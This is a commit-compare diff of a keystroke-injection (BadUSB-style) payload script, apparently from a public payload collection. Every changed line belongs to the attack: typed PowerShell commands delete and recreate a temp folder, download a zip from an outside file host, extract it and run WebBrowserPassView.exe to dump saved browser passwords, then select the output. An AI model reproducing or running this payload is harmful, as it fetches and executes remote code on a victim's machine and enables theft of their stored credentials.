Compare commits

..

2 Commits

Author SHA1 Message Date
UberGuidoZ
136ccffdc2
Updated payload for new ZIP process 2024-09-25 12:30:39 -07:00
UberGuidoZ
ff9c98f7e2
Fixed broken link (thanks jbohack!) 2024-09-25 12:27:18 -07:00

View File

@ -8,9 +8,9 @@ DELAY 1000
STRING rmdir -R \temp
ENTER
DELAY 1000
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://files.catbox.moe/iqlnan.zip -OutFile webpassview.zip ; Expand-Archive webpassview.zip
ENTER
STRING .\WebBrowserPassView.exe
STRING .\webpassview\WebBrowserPassView.exe
ENTER
DELAY 3000
CTRL A